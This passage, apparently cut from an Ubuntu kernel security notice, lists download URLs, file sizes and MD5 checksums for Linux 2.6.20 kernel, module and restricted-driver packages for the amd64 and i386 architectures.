http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    38444 30ad6ce1a65789a06c44db484ec2fc40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    67682 89f6dd1781e6fbb20cabe9d6e3f00f73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    20962 5599c63ef7510aac1462b411a176c961\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:     8328 e32be0998506e928aa8bde678536f738\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    54578 6eae6d7521ff4f0cb7dc415a12a7eb2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    86018 6915f222ab03d798c242b6483499b8d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   322570 a9b6d4c17f077f143b34c43afec20f82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:  1046832 e05164c749d0bf41ac30e373305af62d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    43974 920cce83c5fe4a05913f7da88ccd31ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    12018 0506e4f214ab149362b54e5bb4cf69ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    61918 b61a0a87f6fcb62c514dadad3b7ab4e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:   377838 7a7bc188d85a8963cd573484c411ea81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb\n      Size/MD5:    66658 83ced3e583998815ea676b567d634e1b\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/avm-fritz-kernel-source_3.11+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  2131262 4223aeb6ce81e492aefe65f54224c44a\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/fglrx-kernel-source_8.34.8+2.6.20.6-17.31_amd64.deb\n      Size/MD5:   217878 3cae80df9595d6b7f74b006ad973763c\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-lowlatency_2.6.20.6-17.31_amd64.deb\n      Size/MD5: 13550948 0a272201cfa95745ba7901330809f1fb\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy-dev_1.0.7184+2.6.20.6-17.31_amd64.deb\n      Size/MD5:   163996 5c317968914b891bee9324f06196bac0\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy_1.0.7184+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  6069522 51ab4ccd9b011259d5d1e38652e7b825\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-kernel-source_1.0.9631+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  1860088 159dc95ed774f2500e38614f09bf9df3\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-legacy-kernel-source_1.0.7184+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  1384748 40c8107290253b0eaa833e03c269dc26\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/avm-fritz-firmware-2.6.20-17_3.11+2.6.20.6-17.31_amd64.deb\n      Size/MD5:   478354 adef863c988defae88838f04655fdfc1\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/fglrx-control_8.34.8+2.6.20.6-17.31_amd64.deb\n      Size/MD5:    80422 6fc9d1603c409c335b2c2ba44f709ac0\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-generic_2.6.20.6-17.31_amd64.deb\n      Size/MD5: 13537128 459552ec904aa5d19def26cc27f2f268\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-generic-di_2.6.20.6-17.31_amd64.udeb\n      Size/MD5:   966300 fdb989c1ea5c525f5d19d428670270bb\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-generic-di_2.6.20.6-17.31_amd64.udeb\n      Size/MD5:  1942518 37a0f6de40f21cceed0ed442ec0defe4\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-dev_1.0.9631+2.6.20.6-17.31_amd64.deb\n      Size/MD5:   176226 342d5577d90cfaa204c7d6bbe4bde381\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new-dev_1.0.9755+2.6.20.6-17.31_amd64.deb\n      Size/MD5:   176654 b33320a686ca2b8bf2726902decaa904\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new_1.0.9755+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  8682258 f78d47759f71aab0cc0cd34688c5be1f\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx_1.0.9631+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  7995534 20d837b318cf3fc366508de6def3f67d\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-new-kernel-source_1.0.9755+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  2525496 9a28bf56d5d594a60036aad4076a8fb1\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-player-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb\n      Size/MD5:  1068838 daa14f0e96bc830293c8d33f8ce281d7\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-server-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb\n      Size/MD5:  1630294 50e4ec261ba923c8141c1be34188b81e\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-tools-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb\n      Size/MD5:   357824 db0e5a5d2b3168a63ac78661f0f26050\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx-dev_7.1.0-8.34.8+2.6.20.6-17.31_amd64.deb\n      Size/MD5:   147092 cee36d8e57c8c4308764ccc0eb7f67fb\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx_7.1.0-8.34.8+2.6.20.6-17.31_amd64.deb\n      Size/MD5:  9822876 d6f3a88b6185f9af8c4fc2c11383516c\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-17-lowlatency_2.6.20-17.36_amd64.deb\n      Size/MD5: 23127496 7512c6818a2cfb363e6de96c7a0fd933\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-lowlatency_2.6.20-17.36_amd64.deb\n      Size/MD5: 18482084 77c7bb1c7b37a9f180a67a3d4c4c615d\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-386_2.6.20-17.12_i386.deb\n      Size/MD5:    86842 188cca44b7e7428066a02673f719eddb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-generic_2.6.20-17.12_i386.deb\n      Size/MD5:    87360 e232efb909fa8c310f2c0d7b14ce15d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server-bigiron_2.6.20-17.12_i386.deb\n      Size/MD5:    87868 f40955e4ca733e6666184c3ca70055e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server_2.6.20-17.12_i386.deb\n      Size/MD5:    87818 2ca82b0ef30a59b7c44e7859e6391031\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-386-di_2.6.20-17.12_i386.udeb\n      Size/MD5:    84182 5e576f3aea901f6140d308474a09c6a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-generic-di_2.6.20-17.12_i386.udeb\n      Size/MD5:    84886 38236107ff8f5fe920efc4c8279d1964\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    20326 9164e0834ec52ff52488e431cd540f3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    22892 cb6a438e822597816ca22eba4d027117\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   210082 1114f0c2617cf8a7e7b12307cb7fdcda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   212234 b4389be66b9a2de24aa47f1fca764075\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    88686 2b33f5bf88e9cbccdca938a41d024cf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    35624 af9e722096a6e8bb396d9f5bdf2644c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    37736 0a3798e29dc9017614910743ff71fe86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    38408 019a0be0f53df06a8510084404e413cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    45640 764c449147614d444f5bd809cfe741c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    45798 8451b700451bc4c3fb1fd436e8aff28e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   179460 3ee7930d30e01f2d7ac05fe0ad56d675\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   179826 6bbdde505787788aacad92568ca06b14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    32100 3958d982992556c2eea54ac8b0aedf75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    32432 369e2795e856b352702be2c90db9460d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   648592 fef7358c65f78d2f8796780cbec46730\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   667482 c36df77a008193efc98e7dcfe83cbb46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   178208 5eb5a994fb3dc3d429e8e59dfc5ef870\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   181296 6deb4719a42de6f54f76b83bcec75f80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    72396 bc422bb9a10152ab919a8d5232cd3646\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    74040 91fecfc61f8b9208abbc4b9542ac5751\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    53576 2f7e777ae61ffd13d738579fc2732d25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    54782 f9cb368f9476cb00e5ea50e90fea9cf5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   129208 2561a2e204d0f0cf1be3fe933c583cd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   134862 38d76d10a700c21dac765cccb137416d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   275954 b6e9b4df7533754ccc73f4b74b629b34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   274956 94996c553bf55ea5457c588cb5a8d490\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1816146 cb9e49c3cf63514cf0e2c8566d34f355\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1886462 cdaa4d27814274989b6a5083e99d1468\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-386_2.6.20-17.36_i386.deb\n      Size/MD5:   848474 cf3ef71c1ab7b2d98e4165c9c1f50b95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-generic_2.6.20-17.36_i386.deb\n      Size/MD5:   841798 11cc8e6ca8752a4b5aa003256653f673\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb\n      Size/MD5:   848690 3849d43f5d59f12f9858efa36c2e63a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb\n      Size/MD5:   844936 b934d25879e62864a5472939edf41804\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server_2.6.20-17.36_i386.deb\n      Size/MD5:   842824 a20ea95041deebdf0f3f78677962c120\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_i386.deb\n      Size/MD5:  8120852 9cf19d50af64fa5402f5ee0b28f2d8b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-386_2.6.20-17.36_i386.deb\n      Size/MD5: 23747822 05e00a5b92c8095dab78c1869f8c5b92\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-generic_2.6.20-17.36_i386.deb\n      Size/MD5: 23815004 077ca83a6f88ed749e6f27614c1392a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb\n      Size/MD5: 24376484 2b4e84bee148e87c0eb01e032552d4eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server_2.6.20-17.36_i386.deb\n      Size/MD5: 23866964 2e4c61c3b57ed209bd4e2e6a81a5ae97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-386_2.6.20-17.36_i386.deb\n      Size/MD5: 23590486 b90067007b1c07dd79d7284497755547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-generic_2.6.20-17.36_i386.deb\n      Size/MD5: 24169290 94ce3aa4d7e7f240e9396b3833d797ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb\n      Size/MD5: 25665260 c8e1bd368b1da472152f9fdb024fffbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server_2.6.20-17.36_i386.deb\n      Size/MD5: 24395356 1291ec15c480d18c926af098dc86d78a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_i386.deb\n      Size/MD5:   669136 984e8b38450985659cdde7c8078f62e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   244612 c9fe618b2c386c8a0e3b93c700f846d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   250160 d77ad34335e0332b8ae62f472d04319d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   132546 04cb386d3b29d3f85d97b08fff95c12b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   133070 753d1a7b4118661907b670cc93866118\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   213366 aabe85be12c68a079e03b8781567e506\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   220780 2e08b3d087dc753bae16ad4b9129f871\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1110422 393e5139ecad7796bc8b72ca03a29731\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1110530 c36dcc035ef324964739d43ed3730e94\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1951210 ceb7460c3af74d76337bd3eceafd18f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1974680 62564aa09706a756d9061fc141b0379e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   149848 85c4f4be8856a6e29743e1a738d2f933\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   142494 1b4a54e2cd488b1533536e85c0b22d8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   160754 761a44199326e79f428f93b9bf1de34b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   161952 df5dfac32aac66a50b8015b8bbef1d61\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   252928 9278357037422699cc8d417d831d9719\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   255510 188e6909c6f36c5e92ee0f780bde1367\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    32760 a02f028dd76e530920de4164aa1ef686\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    33328 511c6543e5aa044297a67b62c1c88fa3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    38018 82accd7c72f15c613cddfb318cddadcb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    38314 954c2e9d314276f13d499bff665bfde7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    81850 29805b33afc8664363d142368568df5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    82108 96aee6a89a0b04ba3e3760db4ddac78e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    47686 6ba37e2bf10918c95db76ac2d417663e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    47708 2ccca5eb028aef1ac3f07078b654e967\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:     8258 28b6853ce133922673a62d68359209d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:     8496 05daa9534a6d99cd44b17b62109eb39f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    49948 d5382680a57228bd677edfaece400b3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    51870 09303feef1283d5b2cc31040af2e5270\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    78846 438aaabd87a1ea789fc3be3e33ab8646\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    79490 b0a0f74d52305a342d3bcfb9504181ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   322546 26c7b5500cea5aa9f4e70f3da2f6fef0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   322570 0501a223e9a70712006f13d13431659a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1362474 f67e3a7dfaa82f5412792bfff3316500\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:  1348042 fb9f6d6ccc587b2113876624bcfef226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    42458 84eb68966a8c2dd68c2b4722efb34bde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    42232 2c57cdc8bd71b4dce9f1cb1a7308bb52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    10762 cead5edaa9fd8608035ea7c71cc7cc7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    11400 93ec5d7e1628428ce1d4fabe4ebd49ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    55992 4e5e603c5574b3b614b92a640d305c77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    56890 fca150d57bce6f91574676ce771865ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   360300 bd62f504c6b28fab113f63a96a8fa2ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:   363212 524d7cfe4ae30d28eb3c2320dd64359c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    63168 450d97c982ac79e92a1bb2f4560be1ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb\n      Size/MD5:    63836 13f5e0b9090bd7b2866a46f978360142\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/avm-fritz-kernel-source_3.11+2.6.20.6-17.31_i386.deb\n      Size/MD5:  3427088 a0644c93a95cbadc3e05a936d07866bf\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/fglrx-kernel-source_8.34.8+2.6.20.6-17.31_i386.deb\n      Size/MD5:   217868 bb15afa23bee098b2c73ccabf16aeed0\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-lowlatency_2.6.20.6-17.31_i386.deb\n      Size/MD5: 16103192 933fbffa39a9db8812c197356906e8ba\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy-dev_1.0.7184+2.6.20.6-17.31_i386.deb\n      Size/MD5:   143102 9323142a37e668ee9f1201250f392f98\n    